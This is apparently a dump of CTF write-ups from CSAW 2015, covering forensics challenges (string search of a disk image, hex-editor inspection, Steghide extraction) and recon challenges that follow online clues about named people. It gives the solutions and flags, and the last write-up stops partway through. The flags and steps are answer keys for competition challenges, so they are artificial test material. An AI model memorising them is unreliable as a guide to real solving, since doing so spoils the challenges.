8 | 9 | ##Write-up 10 | Based on the information provided it appears that we will be dealing with an [image](https://en.wikipedia.org/wiki/Disk_image) of a flash hard drive so I am expecting that I will be using forensic software to analyze the file. 11 | 12 | My first step was to download the image file and examine it with the [SANS Investigative Forensic Toolkit](http://digital-forensics.sans.org/community/downloads). The SANS Investigative Forensic Toolkit (SIFT) is a virtual workstation created for incident response and digital forensics use and made available to the whole community as a public service. 13 | ![CTF Image](./Images/CTF1.jpg) 14 | 15 | Open a terminal and type the following command ```srch_string -t d flash.img>output.asc ``` for your image file. The `-t d` option prefixes each extracted string with its decimal byte offset in the image, which is what you need to trace a hit back to the sector or file it lives in. 16 | ![CTF Image](./Images/CTF31.jpg) 17 | 18 | Now use the vi editor command ```vi output.asc``` to open the file output.asc. 19 | ![CTF Image](./Images/CTF32.jpg) 20 | 21 | Viewing the file output.asc we see the strings extracted from the image file: 22 | ![CTF Image](./Images/CTF33.jpg) 23 | 24 | Use the vi command ```/``` to search for the following string ```flag{```: 25 | ![CTF Image](./Images/CTF34.jpg) 26 | 27 | We are able to quickly locate the flag in this image file: 28 | ![CTF Image](./Images/CTF35.jpg) 29 | 30 | The flag recovered to solve this CTF is ```flag{b3l0w_th3_r4dar}``` 31 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Flash option 4.md: -------------------------------------------------------------------------------- 1 | #Flash 2 | 3 | **Category:** Forensics 4 | **Points:** 100 5 | **Description:** 6 | 7 | We were able to grab an image of a harddrive. Find out what's on it. 
8 | 9 | ##Write-up 10 | 11 | Based on the information provided it appears that we will be dealing with an [image](https://en.wikipedia.org/wiki/Disk_image) of a flash hard drive so I am expecting that I will be using forensic software to analyze the file. 12 | 13 | I never know how well data is going to be hidden in a file so I open this file with [Hex Edit](http://www.hexedit.com) and take a quick look. Searching the raw image bytes this way, rather than a mounted filesystem, also picks up content sitting in deleted files, slack space and unallocated space, which a directory walk would miss. 14 | ![CTF Image](./Images/CTF41A.jpg) 15 | 16 | I perform a simple search for the term ```flag``` and I get numerous hits. 17 | ![CTF Image](./Images/CTF42A.jpg) 18 | 19 | So to reduce the scope of the search I change the search term to ```flag{``` and I am immediately taken to the flag for this CTF ```flag{b3l0w_th3_r4dar}``` 20 | ![CTF Image](./Images/CTF43A.jpg) 21 | 22 | The flag recovered to solve this CTF is ```flag{b3l0w_th3_r4dar}``` 23 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF1.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF10.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF10.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF11.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF11.jpg 
-------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF12.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF12.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF13.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF13.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF14.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF14.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF15.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF15.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF16.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF16.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF16A.jpg: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF16A.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF16B.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF16B.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF17.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF17.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF17A.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF17A.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF17B.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF17B.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF18.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF18.jpg 
-------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF19.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF19.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF2.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF20.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF20.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF3.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF31.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF31.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF32.jpg: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF32.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF33.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF33.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF34.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF34.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF35.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF35.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF4.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF41.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF41.jpg 
-------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF41A.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF41A.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF42.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF42.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF42A.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF42A.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF43.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF43.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF43A.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF43A.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF5.jpg: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF5.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF6.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF6.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF7.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF7.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF8.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF8.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF9.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF9.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Readme.md: -------------------------------------------------------------------------------- 1 | #Flash 2 | 3 | **Category:** Forensics 4 | **Points:** 100 5 | **Description:** 6 | 7 | We were able to grab an image of a harddrive. Find out what's on it. 
8 | 9 | ##Write-up 10 | Based on the information provided, it appears that we will be dealing with an [image](https://en.wikipedia.org/wiki/Disk_image) of a flash hard drive, so I am expecting that I will be using forensic software to analyze the file. 11 | 12 | As there are several ways to perform this CTF we included three different write-ups. 13 | 14 | [Flash Option 1](Flash%20option%201.md) 15 | This option provides a very high level approach using any commercial forensic software. 16 | 17 | [Flash Option 2](./Flash%20option%202.md) 18 | This option demonstrates how to use the Autopsy Forensic Browser with The Sleuth Kit running on the [SANS Investigative Forensic Toolkit](http://digital-forensics.sans.org/community/downloads). 19 | 20 | [Flash Option 3](Flash%20option%203.md) 21 | This option demonstrates how to use The Sleuth Kit command 'srch_strings' running on the [SANS Investigative Forensic Toolkit](http://digital-forensics.sans.org/community/downloads). 22 | 23 | [Flash Option 4](Flash%20option%204.md) 24 | This option demonstrates how to use a hex editor to find the flag. 
25 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Keep-Calm-and-CTF/Images/CTF2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Keep-Calm-and-CTF/Images/CTF2.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Keep-Calm-and-CTF/Images/CTF3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Keep-Calm-and-CTF/Images/CTF3.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Keep-Calm-and-CTF/Images/img.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Keep-Calm-and-CTF/Images/img.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Keep-Calm-and-CTF/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | #Keep Calm and CTF 3 | 4 | **Category:** Forensics 5 | **Points:** 100 6 | **Description:** 7 | 8 | My friend sends me pictures before every ctf. He told me this one was special. 9 | Note: this flag doesn't follow the "flag{}" format 10 | 11 | ##Write-up 12 | Our first clues come from the actual description. The challenge identifies this file as a possible image file and states this image is special. This caused me to immediately start thinking this challenge would be related to steganography ([Steganography](https://en.wikipedia.org/wiki/Steganography) is the practice of concealing data within another file). 
The description also states that the flag does not follow the "flag{}" format, so I will need to keep an open mind when searching for the flag and not focus on the word 'flag' per se. 13 | 14 | At first glance the file appears to be a normal image file. It displays properly in an image viewer and there are no error messages present when trying to open the file. 15 | 16 | ![CTF Image](./Images/img.jpg) 17 | 18 | In cases where I suspect steganography, what I usually do first is open the file with a hex editor to see if anything obviously jumps out at me as hidden data. 19 | 20 | 21 | So I open the file with [Hex Edit](http://www.hexedit.com) and take a quick look. 22 | ![CTF Image](./Images/CTF2.jpg) 23 | 24 | Scrolling through the file I can quickly see there appears to be a message hidden at the top of the file. 25 | 26 | ![CTF Image](./Images/CTF3.jpg) 27 | 28 | Entering the value ```h1d1ng_in_4lm0st_pla1n_sigh7``` as the flag solves this challenge. 29 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/airport/Images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/airport/Images/1.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/airport/Images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/airport/Images/2.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/airport/Images/3.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/airport/Images/3.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/airport/Images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/airport/Images/4.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/airport/Images/steghide.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/airport/Images/steghide.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/airport/Readme.md: -------------------------------------------------------------------------------- 1 | #Airport 2 | 3 | **Category:** Forensics 4 | **Points:** 200 5 | **Description:** NA 6 | 7 | [airport_26321e6eac7a7490e527cbe27ceb68c1.zip](airport_26321e6eac7a7490e527cbe27ceb68c1.zip) 8 | 9 | ##Write-up 10 | We get our first clue from hitting the link in the description and retrieving the zip file. This file contains four .png files and one .jpg file. The four png images are aerial views of various unknown airfields. The jpg image is a banner of the popular steganography program called Steghide. After reviewing the Steghide documentation, it's clear the program only supports JPEG, BMP, WAV and AU files. This was the first clue that the hidden data was in the only jpg file contained in the zip file. 11 | 12 | The next step was to determine which airfields were depicted in the four png images. Each airfield image contained at least one highway/road number embedded in the photo. 
This led to Google searches in an attempt to identify all four airfields; e.g., "airport highway 1" revealed Los Angeles International Airport (LAX) for image 3.png. 13 | 14 | ![Image of 3] 15 | (./Images/3.png) 16 | 17 | The hardest part of solving this challenge was 1.png. The airfield in question has yellow road numbers. After massive Google searches it was determined that many European countries use these colors. However, no results were identified. Further review of the image showed a baseball diamond at the top of the image, indicating that the airfield was likely not in Europe. Other countries that use the same color signs finally revealed Cuba (José Martí International Airport) as the answer. 18 | 19 | 20 | ![Image of 1] 21 | (./Images/1.png) 22 | 23 | Also identified was Hong Kong International Airport 24 | ![Image of 2] 25 | (./Images/2.png) 26 | 27 | And Toronto Pearson International Airport 28 | ![Image of 4] 29 | (./Images/4.png) 30 | 31 | After all four airfields were identified it was just a matter of determining their three-letter international identifiers. 32 | 33 | >```python 34 | HAV - José Martí International Airport 35 | HKG - Hong Kong International Airport 36 | LAX - Los Angeles International Airport 37 | YYZ - Toronto Pearson International Airport 38 | >``` 39 | 40 | We concatenated the airport codes together to create the passphrase ```HAVHKGLAXYYZ```. Using Steghide, we used the ```--info``` option and the passphrase to determine if there was an embedded file in the image. 41 | 42 | >``` 43 | c:\steghide-0.5.1-win32\steghide>steghide.exe --info steghide.jpg 44 | "steghide.jpg": 45 | format: jpeg 46 | capacity: 167.0 Byte 47 | Try to get information about embedded data ? (y/n) y 48 | Enter passphrase:HAVHKGLAXYYZ 49 | embedded file "key.txt": 50 | size: 13.0 Byte 51 | encrypted: rijndael-128, cbc 52 | compressed: yes 53 | >``` 54 | 55 | Once confirmed, we extracted the file and obtained the flag in the form of the key.txt file. 
56 | 57 | >``` 58 | c:\steghide-0.5.1-win32\steghide>steghide.exe extract -sf steghide.jpg 59 | Enter passphrase:HAVHKGLAXYYZ 60 | wrote extracted data to "key.txt". 61 | >``` 62 | 63 | Looking into the extracted key.txt file we get the flag ```iH4t3A1rp0rt5``` 64 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/airport/airport_26321e6eac7a7490e527cbe27ceb68c1.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/airport/airport_26321e6eac7a7490e527cbe27ceb68c1.zip -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/1.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/2.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/3.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/4.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/4.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/5.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/decode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/decode.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/enigma.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/enigma.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/js.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/js.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/linkedin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/linkedin.png 
-------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/wcsc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/wcsc.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/yoshi_forum.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/yoshi_forum.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/yoshi_text.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/yoshi_text.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Readme.md: -------------------------------------------------------------------------------- 1 | #Alexander Taylor 2 | 3 | **Category:** Recon 4 | **Points:** 100 5 | **Description:** 6 | 7 | http://fuzyll.com/csaw2015/start 8 | 9 | ##Write-up 10 | We get our first clue from hitting the link in the description. 11 | 12 | ![Image of 1] 13 | (./Images/1.png) 14 | 15 | We are left with an unknown number of steps, but at least we have somewhere to start. Off to Google. Using both his name and the domain name for searches on LinkedIn, we find the following. 
16 | 17 | ![Image of linkedin] 18 | (./Images/linkedin.png) 19 | 20 | Another quick google for USF's hacking club leads us to: 21 | 22 | ![Image of wscs] 23 | (./Images/wcsc.png) 24 | 25 | Trying the acronym leads us to step 2. 26 | 27 | ![Image of 2] 28 | (./Images/2.png) 29 | 30 | Here we are given a base64 encoded message. Decoding gives us our next clue. 31 | 32 | ![Image of decode] 33 | (./Images/decode.png) 34 | 35 | Back to google we go. Using ```fuzyll``` and ```Super Smash Brothers``` we find a hit on ```smashboards.com```. 36 | 37 | ![Image of forum] 38 | (./Images/yoshi_forum.png) 39 | 40 | The profile name is ```fuzyll``` and with all of the postings regarding ```yoshi``` I believe we have our character. 41 | 42 | ![Image of 3] 43 | (./Images/3.png) 44 | 45 | This one took a touch longer than the others, but any forensic activity on the image will reveal our next clue. 46 | 47 | ![Image of text] 48 | (./Images/yoshi_text.png) 49 | 50 | This one took the longest by far. A quick look back at his LinkedIn profile reveals that he has placed in the DEFCON finals for DEFCON 19, 20, 21, and 22. I started my search on DEFCON 17 and 18 figuring he didn't make it to the finals on his first attempt. A lot of searching led me here: 51 | 52 | ![Image of enigma] 53 | (./Images/enigma.png) 54 | 55 | After many other tries, we finally hit ```enigma``` which in turn gives us: 56 | 57 | ![Image of 4] 58 | (./Images/4.png) 59 | 60 | This was another easy step. We can use the developer tools to quickly run the javascript with the given string. 61 | 62 | ![Image of js] 63 | (./Images/js.png) 64 | 65 | Doing so gives us the final path and in turn, the flag. 
66 | 67 | ![Image of 5] 68 | (./Images/5.png) 69 | 70 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Eric-Liang/Images/CSAW.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Eric-Liang/Images/CSAW.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Eric-Liang/Images/brooklyn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Eric-Liang/Images/brooklyn.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Eric-Liang/Images/competitors.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Eric-Liang/Images/competitors.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Eric-Liang/Images/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Eric-Liang/Images/flag.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Eric-Liang/Images/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Eric-Liang/Images/logo.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Eric-Liang/Images/team_website.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Eric-Liang/Images/team_website.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Eric-Liang/Images/teams.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Eric-Liang/Images/teams.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Eric-Liang/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | #Eric Liang 3 | 4 | **Category:** Recon 5 | **Points:** 100 6 | **Description:** Eric played ctfs with some friends a while ago 7 | 8 | 9 | ##Write-up 10 | This 100 point challenge was to find a flag related to Eric Liang and CTFs in which he participated in the past with some friends. The first thing we set out to do was find out more information on Eric to determine where we should be looking. We started with some background information on him from Facebook and found this post on the CSAW page: 11 | 12 | ![Image of 1] 13 | (./Images/CSAW.png) 14 | 15 | Our thinking now was to search the CSAW archives for the past 2 years for teams on which he may have participated. And here came the first of many frustrations for this challenge: There were hundreds of teams to search through and no team member listing! We looked through the list one at a time then decided to narrow the list to just the NYU teams and look up members on CTFTime.org. We got discouraged after looking up several teams and seeing no member listing. We moved on to the 2014 archive – this proved to be the first of many wrong turns we took on this challenge. 
